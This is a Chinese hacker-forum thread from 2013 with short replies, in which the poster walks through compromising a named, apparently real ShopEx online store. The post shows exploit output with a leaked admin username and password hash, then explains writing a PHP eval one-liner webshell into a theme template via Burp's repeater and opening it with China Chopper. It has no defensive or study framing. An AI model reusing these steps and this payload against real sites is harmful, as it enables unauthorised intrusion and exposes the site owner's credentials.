请选择 进入手机版 | 继续访问电脑版
查看: 2734|回复: 61

burp拿shopex_webshell 无聊掳过 大牛勿喷

  [复制链接]

该用户从未签到

发表于 2013-11-24 05:56:24 | 显示全部楼层 |阅读模式
本帖最后由 m0ox 于 2013-11-24 05:58 编辑

作者:弥心    来自:www.ihonker.org         

视频教程下载地址:
游客,如果您要查看本帖隐藏内容请回复


http://www.ccoo123.com/

http://www.ccoo123.com/shopadmin/index.php?ctl=passport&act=login


Send data to host www.ccoo123.com
Please wait, data is being received
Receive Data 17
Receive Data 9198
Receive Data 18103
Receive Data 21867
Receive Data 26661
Receive Data 30803
Exploit Success
username:adminczc
username:feb5cea0400a26926d2a587a6b8c0f0e

说下
join 加载
打开 burp
run  运行
show 列出所有的 exp

之前我解过了

步骤: 页面管理 - 模板列表- 编辑- 模板- 随便点击一个编辑- 保存下  -
图片


这边说明下
tmpid=在服务器生成的文件夹  
name=文件名
file_source= 文件的内容

我们尝试写入一句话

先把burp 导入 repeater

<?php eval($_POST[1]);?>

http://www.ccoo123.com/themes/b2dgfc/1.php

go

我们用菜刀打开
图片
OK 成共了


其实还有方法 就是上传模板  模板里面包含 一句话木马文件  方法如上  

下次在说   谢谢观看   

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?注册

x
回复

使用道具 举报

该用户从未签到

发表于 2013-11-24 10:00:27 | 显示全部楼层
????很想知道隐藏了什么
回复 支持 反对

使用道具 举报

llsc 该用户已被删除
发表于 2013-11-24 11:18:44 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
回复 支持 反对

使用道具 举报

该用户从未签到

发表于 2013-11-24 11:51:45 | 显示全部楼层
顶一个先
回复 支持 反对

使用道具 举报

  • TA的每日心情
    无聊
    4 天前
  • 签到天数: 11 天

    [LV.3]偶尔看看II

    发表于 2013-11-24 12:24:55 | 显示全部楼层
    这个要看看啊。。。
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2013-11-24 12:28:31 | 显示全部楼层
    提示: 作者被禁止或删除 内容自动屏蔽
    回复 支持 反对

    使用道具 举报

    axiao 该用户已被删除
    发表于 2013-11-24 14:32:08 | 显示全部楼层
    提示: 作者被禁止或删除 内容自动屏蔽
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2013-11-25 00:26:28 | 显示全部楼层
    神器!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2013-11-27 10:30:56 | 显示全部楼层
    谢谢分享
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    4 天前
  • 签到天数: 114 天

    [LV.6]常住居民II

    发表于 2013-11-27 11:58:18 | 显示全部楼层
    低调学习中~~~~~~~~~~
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    快速回复 返回顶部 返回列表